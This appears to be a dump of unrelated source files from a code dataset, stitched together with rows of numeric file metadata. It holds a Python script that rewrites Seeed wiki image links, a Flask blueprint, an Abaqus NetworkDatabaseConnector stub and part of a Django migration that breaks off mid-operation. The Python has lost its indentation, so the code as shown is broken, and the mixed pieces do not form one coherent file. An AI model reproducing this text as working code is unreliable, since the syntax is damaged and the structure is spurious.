if url[:url.find("/master/")][-3:] == "raw" : #找到对应文件夹的名字
name = url[:url.find("/master/") - 4]
ddd = "https://github.com/SeeedDocument/" +name + "/raw/master"
else:
name = url[:url.find("/master/") - 5]
ddd = "https://github.com/SeeedDocument/" + name + "/blob/master"
print(line)
new_line = line.replace(ddd,"https://files.seeedstudio.com/wiki/"+name) #替换链接地址
print(new_line)
line = new_line
# if len(new_line[a:b]) > 1:
# print(new_line[a:b])
# try:
# response = requests.get(new_line[a:b])
# except requests.RequestException as e:
# print("Couldn't communicate with the server. If it's running, take a look at its output.")
# fin.append(line)
# response.close()
# continue
# if response.status_code == 404:
# print("url is lost!!")
# else:
# # print "url is reachable!"
# print("status code: " + str(response.status_code))
# print("GET request succeeded!")
# response.close()
# line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument") != -1:
url = line[line.find("https://raw.githubusercontent.com/SeeedDocument")+48:]
name = url[:url.find("/master")]
#print(line)
print("https://raw.githubusercontent.com/SeeedDocument/" + name + "/master")
print("https://files.seeedstudio.com/wiki/" + name)
new_line = line.replace("https://raw.githubusercontent.com/SeeedDocument/" + name + "/master","https://files.seeedstudio.com/wiki/" + name)
line = new_line
if line.find("https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png)\"") != -1:
new_line = line.replace(
"https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png)\"", \
"https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png")
line = new_line
if line.find("https://github.com/SeeedDocument/Wiki_Banner/raw/master/new_product.jpg") != -1:
new_line = line.replace(
"https://github.com/SeeedDocument/Wiki_Banner/raw/master/new_product.jpg", \
"https://files.seeedstudio.com/wiki/Wiki_Banner/new_product.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/arduino_logo.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/arduino_logo.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/arduino_logo.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/arduino_logo_n.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/arduino_logo_n.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/arduino_logo_n.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/raspberry_pi_logo_n.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/raspberry_pi_logo_n.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/raspberry_pi_logo_n.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/raspberry_pi_logo.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/raspberry_pi_logo.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/raspberry_pi_logo.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/bbg_logo_n.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/bbg_logo_n.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/bbg_logo_n.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/bbg_logo.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/bbg_logo.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/bbg_logo.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/wio_logo.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/wio_logo.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/wio_logo.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/wio_logo_n.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/wio_logo_n.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/wio_logo_n.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/linkit_logo_n.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/linkit_logo_n.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/linkit_logo_n.jpg")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/linkit_logo.jpg") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/wiki_english/master/docs/images/linkit_logo.jpg", \
"https://files.seeedstudio.com/wiki/wiki_english/docs/images/linkit_logo.jpg")
line = new_line
if line.find("https://github.com/SeeedDocument/wiki_english/raw/master") != -1:
new_line = line.replace(
"https://github.com/SeeedDocument/wiki_english/raw/master", \
"https://files.seeedstudio.com/wiki/wiki_english")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/Seeed-WiKi/master") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/Seeed-WiKi/master", \
"https://files.seeedstudio.com/wiki/Seeed-WiKi")
line = new_line
if line.find("https://raw.githubusercontent.com/SeeedDocument/common/master") != -1:
new_line = line.replace(
"https://raw.githubusercontent.com/SeeedDocument/common/master", \
"https://files.seeedstudio.com/wiki/common")
line = new_line
if line.find("https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png /></a></p>") != -1:
new_line = line.replace(
"https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png /></a></p>", \
"https://files.seeedstudio.com/wiki/Seeed-WiKi/docs/images/300px-Get_One_Now_Banner-ragular.png\" /></a></p>")
line = new_line
fin.append(line)
except Exception as err:
print(err)
continue
doc.close()
# 写入修改好的新行
doc = open("docs/" + doc_md, mode = "wt", encoding='UTF-8')
for line in fin:
doc.write(line)
doc.close()
print(doc_md)
fin.clear()
# if line.find("raw.githubusercontent.com/SeeedDocument") != -1 :
# new_line = line.replace(
# "raw/master/", "").replace("github.com/SeeedDocument", "files.seeedstudio.com")
#print(url)
if __name__ == "__main__":
main()
| 61.167598
| 163
| 0.520778
| 1,116
| 10,949
| 4.956093
| 0.103047
| 0.053155
| 0.120593
| 0.188754
| 0.841801
| 0.818297
| 0.770024
| 0.720665
| 0.702043
| 0.683602
| 0
| 0.007799
| 0.355923
| 10,949
| 178
| 164
| 61.511236
| 0.776517
| 0.088684
| 0
| 0.295082
| 0
| 0.204918
| 0.453842
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008197
| false
| 0
| 0.008197
| 0
| 0.016393
| 0.04918
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ca40df2e49b21b8d0c7ba108ca7e9fe7461b652e
| 198
|
py
|
Python
|
app/v2/template/__init__.py
|
cds-snc/notifier-api
|
90b385ec49efbaee7e607516fc7d9f08991af813
|
[
"MIT"
] | 41
|
2019-11-28T16:58:41.000Z
|
2022-01-28T21:11:16.000Z
|
app/v2/template/__init__.py
|
cds-snc/notification-api
|
b1c1064f291eb860b494c3fa65ac256ad70bf47c
|
[
"MIT"
] | 1,083
|
2019-07-08T12:57:24.000Z
|
2022-03-08T18:53:40.000Z
|
app/v2/template/__init__.py
|
cds-snc/notifier-api
|
90b385ec49efbaee7e607516fc7d9f08991af813
|
[
"MIT"
] | 9
|
2020-01-24T19:56:43.000Z
|
2022-01-27T21:36:53.000Z
|
from flask import Blueprint
from app.v2.errors import register_errors
v2_template_blueprint = Blueprint("v2_template", __name__, url_prefix="/v2/template")
register_errors(v2_template_blueprint)
| 24.75
| 85
| 0.833333
| 27
| 198
| 5.666667
| 0.444444
| 0.261438
| 0.20915
| 0.313725
| 0.431373
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027624
| 0.085859
| 198
| 7
| 86
| 28.285714
| 0.81768
| 0
| 0
| 0
| 0
| 0
| 0.116162
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
ca73aec74d96cb7220316cda3a5db4f006f32ec9
| 5,844
|
py
|
Python
|
src/abaqus/Session/NetworkDatabaseConnector.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/Session/NetworkDatabaseConnector.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/Session/NetworkDatabaseConnector.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
class NetworkDatabaseConnector:
"""The NetworkDatabaseConnector object allows you to access an output database on a remote
system.
Attributes
----------
connected: Boolean
A Boolean specifying if the connection between the client and the server is established.
Notes
-----
This object can be accessed by:
.. code-block:: python
session.networkDatabaseConnectors[name]
"""
# A Boolean specifying if the connection between the client and the server is established.
connected: Boolean = OFF
def __init__(self, name: str, hostName: str, directory: str, remoteAbaqusDriverName: str = '',
remoteLoginMechanism: SymbolicConstant = SSH, sshPath: str = '', serverPort: int = 0,
connectionPort: int = 0, serverTimeout: int = 86400,
allowAutomaticStartup: Boolean = ON):
"""This method creates a NetworkDatabaseConnector object that you can use to access a
remote output database. You can create a network database connector from any platform:
Windows or Linux. However, the network database connector server must reside on a Linux
platform; you cannot access an output database that resides on a remote Windows system.
You can access only a remote output database; you cannot access a remote model database.
Notes
-----
This function can be accessed by:
.. code-block:: python
session.NetworkDatabaseConnector
Parameters
----------
name
A String specifying the repository key.
hostName
A String specifying the name of the remote computer.
directory
A String specifying the directory on the remote computer.
remoteAbaqusDriverName
A String specifying the name of command to execute Abaqus/CAE on the remote computer.
remoteLoginMechanism
A SymbolicConstant specifying the remote shell command on the local system. Possible
values are RSH and SSH. The default value is SSH.
sshPath
A String specifying the path to the`ssh` command on the local system. The default value
is an empty string.
serverPort
An Int specifying the server port on the remote computer. If *serverPort* =0, the host
and remote systems are allowed to establish their own port numbers. The default value is
0.
connectionPort
An Int specifying the connection port on the remote computer. The default value is 0.
serverTimeout
An Int specifying the timeout in seconds for the remote server. For example: 86400
corresponds to one day. The server exits if it does not receive any communication from
the client during the time specified. The default value is 86400.
allowAutomaticStartup
A Boolean specifying whether to start the remote network database connector server. The
default value is ON.
Returns
-------
A NetworkDatabaseConnector object.
"""
pass
def start(self, serverPort: int = 0, serverTimeout: int = 86400):
"""This method starts the remote network database connector server on the remote host.
Parameters
----------
serverPort
An Int specifying the server port on the remote computer. If *serverPort* =0, the host
and remote systems are allowed to establish their own port numbers. The default value is
0.
serverTimeout
An Int specifying the timeout in seconds for the remote server. For example: 86400
corresponds to one day. The server exits if it does not receive any communication from
the client during the time specified. The default value is 86400.
"""
pass
def stop(self):
"""This method stops the remote network database connector server on the remote host.
"""
pass
def setValues(self, remoteAbaqusDriverName: str = '', remoteLoginMechanism: SymbolicConstant = SSH,
sshPath: str = '', serverPort: int = 0, connectionPort: int = 0,
serverTimeout: int = 86400, allowAutomaticStartup: Boolean = ON):
"""This method modifies the NetworkDatabaseConnector object.
Parameters
----------
remoteAbaqusDriverName
A String specifying the name of command to execute Abaqus/CAE on the remote computer.
remoteLoginMechanism
A SymbolicConstant specifying the remote shell command on the local system. Possible
values are RSH and SSH. The default value is SSH.
sshPath
A String specifying the path to the`ssh` command on the local system. The default value
is an empty string.
serverPort
An Int specifying the server port on the remote computer. If *serverPort* =0, the host
and remote systems are allowed to establish their own port numbers. The default value is
0.
connectionPort
An Int specifying the connection port on the remote computer. The default value is 0.
serverTimeout
An Int specifying the timeout in seconds for the remote server. For example: 86400
corresponds to one day. The server exits if it does not receive any communication from
the client during the time specified. The default value is 86400.
allowAutomaticStartup
A Boolean specifying whether to start the remote network database connector server. The
default value is ON.
"""
pass
| 44.610687
| 103
| 0.646475
| 686
| 5,844
| 5.501458
| 0.196793
| 0.047695
| 0.055644
| 0.063063
| 0.753577
| 0.734234
| 0.727345
| 0.727345
| 0.707737
| 0.707737
| 0
| 0.014353
| 0.308522
| 5,844
| 130
| 104
| 44.953846
| 0.919574
| 0.726215
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.0625
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
04840afb31e795889ef11912484801b91e8841a8
| 40,005
|
py
|
Python
|
xos/core/migrations/0003_auto_20190304_1358.py
|
mary-grace/xos
|
3e269834d29f936757f5091183c9b5188ed5cb9e
|
[
"Apache-2.0"
] | 66
|
2015-01-29T20:56:45.000Z
|
2021-07-01T09:56:44.000Z
|
xos/core/migrations/0003_auto_20190304_1358.py
|
mary-grace/xos
|
3e269834d29f936757f5091183c9b5188ed5cb9e
|
[
"Apache-2.0"
] | 112
|
2015-01-30T19:59:09.000Z
|
2017-04-08T16:43:40.000Z
|
xos/core/migrations/0003_auto_20190304_1358.py
|
mary-grace/xos
|
3e269834d29f936757f5091183c9b5188ed5cb9e
|
[
"Apache-2.0"
] | 66
|
2015-02-09T17:35:36.000Z
|
2021-03-24T12:31:19.000Z
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-03-04 18:58
from __future__ import unicode_literals
import core.models.xosbase_header
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('core', '0002_initial_data'),
]
operations = [
migrations.AlterField(
model_name='addresspool_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='addresspool_decl',
name='cidr',
field=models.CharField(blank=True, help_text=b'Subnet for this AddressPool', max_length=32),
),
migrations.AlterField(
model_name='addresspool_decl',
name='gateway_ip',
field=models.CharField(blank=True, help_text=b'Gateway IP address for this AddressPool', max_length=32),
),
migrations.AlterField(
model_name='addresspool_decl',
name='gateway_mac',
field=models.CharField(blank=True, help_text=b'Gateway MAC address for this AddressPool', max_length=32),
),
migrations.AlterField(
model_name='addresspool_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='addresspool_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='controller_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='controller_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='controller_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='controllerimages_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='controllerimages_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='controllerimages_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='controllernetwork_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='controllernetwork_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='controllernetwork_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='controllerrole_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='controllerrole_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='controllerrole_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='controllersite_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='controllersite_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='controllersite_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='controllersiteprivilege_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='controllersiteprivilege_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='controllersiteprivilege_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='controllerslice_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='controllerslice_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='controllerslice_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='controllersliceprivilege_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='controllersliceprivilege_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='controllersliceprivilege_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='controlleruser_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='controlleruser_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='controlleruser_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='deployment_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='deployment_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='deployment_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='flavor_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='flavor_decl',
name='flavor',
field=core.models.xosbase_header.StrippedCharField(blank=True, help_text=b'flavor string used to configure deployments', max_length=32),
),
migrations.AlterField(
model_name='flavor_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='flavor_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='image_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='image_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='image_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='imagedeployments_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='imagedeployments_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='imagedeployments_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='instance_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='instance_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='instance_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='interfacetype_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='interfacetype_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='interfacetype_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='network_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='network_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='network_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='networkparameter_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='networkparameter_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='networkparameter_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='networkparametertype_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='networkparametertype_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='networkparametertype_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='networkslice_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='networkslice_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='networkslice_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='networktemplate_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='networktemplate_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='networktemplate_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='node_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='node_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='node_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='nodelabel_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='nodelabel_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='nodelabel_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='port_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='port_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='port_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='principal_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='principal_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='principal_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='privilege_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='privilege_decl',
name='expires',
field=models.DateTimeField(blank=True, max_length=1024, null=True),
),
migrations.AlterField(
model_name='privilege_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='privilege_decl',
name='permission',
field=models.CharField(blank=True, default=b'all', max_length=1024),
),
migrations.AlterField(
model_name='privilege_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='role_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='role_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='role_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='service_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='service_decl',
name='leaf_model_name',
field=models.CharField(blank=True, help_text=b'The most specialized model in this chain of inheritance, often defined by a service developer', max_length=1024),
),
migrations.AlterField(
model_name='service_decl',
name='updated',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, help_text=b'Time this model was changed by a non-synchronizer'),
),
migrations.AlterField(
model_name='serviceattribute_decl',
name='backend_status',
field=models.CharField(blank=True, default=b'Provisioning in progress', max_length=1024),
),
migrations.AlterField(
model_name='serviceattribute_decl',
name='leaf_model_name',
